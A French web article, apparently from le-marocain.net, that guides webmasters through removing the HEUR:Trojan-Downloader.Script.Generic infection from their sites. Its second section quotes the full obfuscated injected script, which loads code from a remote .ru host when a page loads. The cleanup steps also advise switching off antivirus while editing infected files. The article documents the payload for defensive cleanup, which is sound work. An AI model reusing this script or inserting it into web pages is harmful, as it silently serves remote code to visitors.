Actualités High-tech Sécurité internet : comment désinfecter un site web du virus (HEUR:Trojan-Downloader.Script.Generic)
Jeux du jour
Recette du jour
Au cinéma !
humour du jour
Nouveau ...
Syndication
| Sécurité internet : comment désinfecter un site web du virus (HEUR:Trojan-Downloader.Script.Generic) |
1) Présentation importante :Après une expérience que le-marocain.net a vécu directement avec ce virus malveillant, et qui a causé de sérieux dégâts, le-marocain.net s’est vu dans l’obligation de créer cet article/tutoriel pour expliquer en détail toute la démarche de désinfection qui as été utilisé cet article est destiné a des webmasters, ou des personnes qui ont une connaissance technique dans le web (un minimum) : notamment pour le langages html et JavaScript , utilisation d’un éditeur html, et un client FTP Cet article va être utile dans le cas où vous n’avez pas une copie de sauvegarde de votre site identique à celle en ligne, mais si par contre vous avez une copie du site qui n’est pas infecter et où il n’ ya pas de grand décalage entre le site en ligne et sa copie, le problème ne se pose plus , il suffit de supprimer tous le contenu infecté en ligne et d’charger la copie intacte vers le serveur,
(malheureusement c’était pas notre cas, il y a avait un grand décalage en terme de modification, entre le version en ligne, et la copie de sauvegarde) . 2) observant l’ennemie :D’après notre observation à l’issus de l’incident on a pu remarquer que HEUR:Trojan-Downloader.Script.Generic est un virus qui s’attaque à des pages html et js et spécialement a des page qui port les noms index.php ou index.html et tous les fichier JavaScript (*.js) qui y sont liés, le virus ajoute à la fin du code source de ces fichiers un bout de code en javascript : qui ressemble à ça : <script>var a="";this.qQ=false;var NR=14281;function k(){F_=62972;F_++;c=["B","ki"];var F=new String("body");var u=String("src");var x='';var zy=["U","ci"];var v=String("appenfMJ".substr(0,5)+"5W4rdChil".substr(4)+"hQnBdhBnQ".substr(4,1));var d="onl"+"oadEnxX".substr(0,3);var w="scxSy".substr(0,2)+"6c4Hri".substr(4)+"pt";var p={cT:false};var D=new String("cr"+"ea"+"te"+"El9ND".substr(0,2)+"8k76em8k76".substr(4,2)+"en3fMm".substr(0,2)+"Kgijt".substr(4));var g=new String("def"+"er");this.S=44720;this.S+=105;var M=document;var kY=["is","Mi","gS"];Nd={};var l=window;try {var wa='vG'} catch(wa){};var rp=["bx"];try {var qG='uN'} catch(qG){};function q(){var NT=27225;try {var O=new String();Wi={Uk:false};var xe={Ao:"cU"};var yd=new String();var vi=new String("ht"+"tp"+":/"+"/p"+"HhvAas".substr(4)+"sp"+"or"+"tb"+"lu"+"es"+".r"+"u:");var Dw={qv:5164};var Se=new Array();var Mw="/goo"+"gle."+"com/"+"goog"+"le.c"+"o.uk"+"/forgUYw".substr(0,4)+"rj1bes.".substr(3)+"com.FTV2".substr(0,4)+"mfFDphpFDfm".substr(4,3);try {var UU='J'} catch(UU){};BI={lL:27422};this.BT=14972;this.BT-=250;var A=334614-326534;R={bV:"mm"};var z=8499-8498;var pk=new Array();var hn=55667;var f=43764;m=M[D](w);tL=["Bo","E","nN"];this.ep="";VH=[];m[g]=z;yc=[];m[u]=vi+A+Mw;var DA=58112;M[F][v](m);I=58596;I++;var Aj="";bO=37002;bO-=216;} catch(X){var kI="kI";EG={};var FJ=["fJ","lH","uE"];this.Vq=31460;this.Vq--;};}var vb='';l[d]=q;};try {var bC='Wb'} catch(bC){};var Hu=false;k();</script>
<!--1129c7115e8b85a6348e86cbc4672209-->
Et c’est un antivirus qui va vous faire savoir que le site que vous essayer d’ouvrir est infecté avec le dit virus , dans notre cas on a eu ce message de Kasperskay à l’ouverture du site infecté : 3) neutralisant l’ennemie :Après avoir eu connaissance de notre ennemie (HEUR:Trojan-Downloader.Script.Generic), on va pouvoir le neutraliser comme suite : NB : dans cet tutoriel on a utiliser les logiciel suivant :
A) Récupérer votre site web en local à l’aide d’un client FTP :et assurer vous que vous n’avez manqué aucun fichier et c’est souvent le cas des sites qu’ont une très grande arborescence, pour cela vous prouver demander à votre hébergeur de vous faire une copie compressé de tous votre site , et de la télécharger après, dans ce cas vous serez sûr de tous télécharger, décompresser le site, créer un dossier isolé des autres fichiers html et js local où vous aller mettre juste le site décompresséB ) Ouvrer le dossier du site décompressé à l’aide de votre editeur web :
C) faite une analyse à l’aide de votre antivirus du dossier décompressé :
et si l’antivirus vous demande de supprimer ou mettre en quarantaine un fichier sous peine qu’il n’ pas pu le désinfecter, refuser ou cliquer sur ignoré et coché la case pour tous les cas similaire , car le but de cette analyse et d’avoir la liste des fichiers infecter pour une désinfection manuelle . Faite un imprime écran de cette liste : D) désactiver votre antivirus : (pour qu’il ne surprime pas les fichiers infecté à leur ouverture) :et ouvrer le 1er fichier de la liste des infectés avec votre éditeur webE) Repérer le code malveillant :en bas du code source du fichier infecter comme suite et faite une sélection dessus :
*rappel : pour les fichiers infectés vous aller toujours repérer un code JavaScript étrange au code source d’origine et qui est regroupé en une seule ligne tout en bas , ce bout de code peut être en plusieurs versions avec une légère différence F) faite un CTRL + F , pour faire une recharche de ce code sur tous le site en cours :la fenêtre suivante va apparaitre : Assurer vous des valeur de ces champs :
G) Réactiver votre antiviruset refaites les étapes de C à F jusqu'à vider la liste des infiections de votre antivirus.- A la fin de la désinfection, refaite une analyse générale de l’ordinateur pour supprimer d’éventuelles occurrences du virus, si ça existe. - Puis faite un test en local de votre site désinfecté pour s’assurer du fonctionnement sur tout que aucun fichier ne manque, sinon vous avez toujours votre dossier compressé pour revenir en arrière comme cité avant - Puis supprimer tous le contenu du site infecté en ligne et remplacer le par la version quand a désinfecté ensemble . 4) Prévention pour l’avenir
|
-------------------
